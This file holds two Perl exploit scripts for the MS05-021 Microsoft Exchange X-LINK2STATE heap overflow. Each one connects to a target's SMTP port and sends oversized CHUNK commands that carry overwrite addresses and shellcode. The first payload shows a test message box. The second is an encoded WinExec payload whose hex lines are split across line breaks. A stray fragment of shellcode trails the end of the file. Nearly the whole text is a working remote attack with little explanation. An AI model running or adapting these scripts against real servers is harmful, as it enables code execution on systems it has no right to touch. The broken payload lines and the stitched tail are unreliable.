#!/bin/perl
#
#
# MS05-021 Exchange X-LINK2STATE Heap Overflow
# Author: Evgeny Pinchuk
# For educational purposes only.
#
# Tested on:
# Windows 2000 Server SP4 EN
# Microsoft Exchange 2000 SP3
#
# Thanks and greets:
# Halvar Flake (thx for the right directions)
# Alex Behar, Yuri Gushin, Ishay Sommer, Ziv Gadot and Dave Hawkins
#
#

use IO::Socket::INET;

my $host = shift(@ARGV);
my $port = 25;
my $reply;
my $request;
my $EAX="\x55\xB2\xD3\x77"; # CALL DWORD PTR [ESI+0x4C] (rpcrt4.dll)
my $ECX="\xF0\xA1\x5C\x7C"; # lpTopLevelExceptionFilter
my $JMP="\xEB\x10";


my $SC="\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x37\x59\x88\x51\x0a\xbb\xD5\x01" .
"\x59\x7C\x51\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x0b\x51\x50\xbb\x5F" .
"\x0C\x59\x7C\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x0D\x31\xd2\x52\x51" .
"\x51\x52\xff\xd0\x31\xd2\x50\xb8\x72\x69\x59\x7C\xff\xd0\xe8\xc4\xff" .
"\xff\xff\x75\x73\x65\x72\x33\x32\x2e\x64\x6c\x6c\x4e\xe8\xc2\xff\xff" .
"\xff\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x41\x4e\xe8\xc2\xff\xff" .
"\xff\x4D\x53\x30\x35\x2D\x30\x32\x31\x20\x54\x65\x73\x74\x4e";

my $cmd="X-LINK2STATE CHUNK=";

my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
$socket or die "Cannot connect to host!\n";

recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
$request = "EHLO\r\n";
send $socket, $request, 0;
print "[+] Sent EHLO\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
$request = $cmd . "A"x1000 . "\r\n";
send $socket, $request, 0;
print "[+] Sent 1st chunk\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
$request = "A"x30 . $JMP . $EAX . $ECX . "B"x100 . $SC;
my $left=1000-length($request);
$request = $request . "C"x$left;
$request = $cmd . $request . "\r\n";
send $socket, $request, 0;
print "[+] Sent 2nd chunk\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
close $socket;
$socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
$socket or die "Cannot connect to host!\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
$request = "EHLO\r\n";
send $socket, $request, 0;
print "[+] Sent EHLO\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
$request = $cmd . "A"x1000 . "\r\n";
send $socket, $request, 0;
print "[+] Sent 3rd chunk\n";

close $socket;

#!/bin/perl
#
#
# MS05-021 Exchange X-LINK2STATE Heap Overflow
# Author: Evgeny Pinchuk
# For educational purposes only.
#
# Tested on:
# Windows 2000 Server SP4 EN
# Microsoft Exchange 2000 SP3
#
# WinExec Shellcode
#
# Thanks and greets:
# Halvar Flake (thx for the right directions)
# Alex Behar, Yuri Gushin, Ishay Sommer, Ziv Gadot and Dave Hawkins
#
#

use IO::Socket::INET;

my $host = shift(@ARGV);
my $port = 25;
my $reply;
my $request;
my $EAX="\x55\xB2\xD3\x77"; # CALL DWORD PTR [ESI+0x4C] (rpcrt4.dll)
my $ECX="\xF0\xA1\x5C\x7C"; # lpTopLevelExceptionFilter
my $JMP="\xEB\x10";



my $SC=" \xEB\x0F\x5B\x80\x33\x99\x43\x81\x3B\x72\x35\x37\x
2E\x75\xF4\x74\x05\xE8\xEC\xFF\xFF\xFF".
" \xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12\xE9\x85\x
34\x12\xE9\x91\xCF\xF1\x17\xD7\x97\x75".
" \xF1\x76\x57\x79\xF9\xF1\x34\x40\x9C\x57\xF1\xEB\x
67\x2A\x8F\xF1\x8E\x56\x1E\x49\xF1\x7E".
" \xE0\x5F\xE0\xF1\x7C\xD0\x1F\xD0\xF1\x3D\x34\xB7\x
70\xF1\x3D\x83\xE9\x5E\xF1\x40\x90\x6C".
" \x34\xF1\x52\x74\x65\xA2\xCC\x10\x7C\xF3\x92\xC0\x
19\x60\x9E\xED\xA9\x19\x60\x9F\xED\x8D".
" \x66\xEC\xA9\x66\xED\x14\x99\x71\x42\x99\x99\x99\x
10\xDD\x14\x99\x7B\x7D\x72\xB7\xC8\xF1".
" \xAA\xAB\x99\x99\xF1\xEE\xEA\xAB\xC6\xCD\x66\xCC\x
B5\x10\xDC\xA9\xC0\xC0\xC0\x72\x4C\xC8".
" \xF1\xEB\xED\x99\x99\xF1\xF4\xEA\xEF\xFA\xCD\x66\x
CC\xB5\x10\xDC\xA9\xC0\xC0\xC0\x72\x27".
" \xA8\x66\xFF\x18\x75\x09\x98\xCD\xF1\x98\x98\x99\x
99\x66\xCC\x9D\xCE\xCE\xCE\xCE\xDE\xCE".
" \xDE\xCE\x66\xCC\x91\x10\x5A\xA8\x66\xCE\xCE\xF1\x
9B\x99\xB5\x58\x10\x7F\xF3\x89\xCF\xCA".
" \x66\xCC\x95\xCE\xCA\x66\xCC\x89\xCE\xCF\xCA\x66\x
CC\x8D\x10\xDC\xA9\xCC\xCE\x72\x9C\x66".
" \xCC\x85\x72\x77\x71\x6F\x66\x66\x66\x12\xED\xBD\x
9D\x12\xC7\xA9\xF1\xFA\xF4\xFD\x99\x10".
" \x7B\xFF\x18\x75\xCD\x99\x14\xA5\xBD\xA8\x59\xF3\x
8C\xC0\x6A\x32\x5F\xDD\xBD\x89\xDD\x67".
" \xDD\xBD\xA4\x10\xC5\xBD\xD1\x10\xC5\xBD\xD5\x10\x
C5\xBD\xC9\x14\xDD\xBD\x89\xCD\xC9\xA8".
" \x66\xCE\xCE\xCE\xDE\xCE\xD6\xCE\xCE\xCB\xCE\x66\x
CF\xB9\x10\x78\xF1\x66\x66\x66\x66\x66".
" \xA8\x66\xCF\xBD\xCE\x66\xCF\x81\x66\xCF\xB1\xC8\x
CF\x12\xED\xBD\x89\x12\xDF\xA5\x12\xCD".
" \x9F\xE1\x98\x6B\x12\xD3\x81\x12\xC3\xB9\x98\x6A\x
7A\xA1\xD0\x12\xAD\x12\x9A\xED\xBD\x89".
" \xA8\x66\xA8\x59\x65\x35\x1D\x59\xED\x9E\x58\x56\x
94\x98\x5E\x72\x6D\xA2\xE5\xBD\x95\xEC".
" \x46\x12\xC3\xBD\x9A\xC5\xBD\x89\xFF\x12\x95\xD2\x
12\xC3\x85\x9A\xC5\xBD\x89\x12\x9D\x12".
" \x9A\xDD\xBD\x89\xC7\xC0\x5B\x91\x99\x72\x35\x37\x
2E";

my $cmd="X-LINK2STATE CHUNK=";

my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
$socket or die "Cannot connect to host!\n";

recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
$request = "EHLO\r\n";
send $socket, $request, 0;
print "[+] Sent EHLO\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
$request = $cmd . "A"x1000 . "\r\n";
send $socket, $request, 0;
print "[+] Sent 1st chunk\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
$request = "A"x30 . $JMP . $EAX . $ECX . "B"x100 . $SC ;
my $left=1000-length($request);
$request = $request . "C"x$left;
$request = $cmd . $request . "\r\n";
send $socket, $request, 0;
print "[+] Sent 2nd chunk\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
close $socket;
$socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
$socket or die "Cannot connect to host!\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
$request = "EHLO\r\n";
send $socket, $request, 0;
print "[+] Sent EHLO\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
$request = $cmd . "A"x1000 . "\r\n";
send $socket, $request, 0;
print "[+] Sent 3rd chunk\n";

close $socket;

\x4D\x53\x30\x35\x2D\x30\x32\x31\x20\x54\x65\x73\x74\x4e";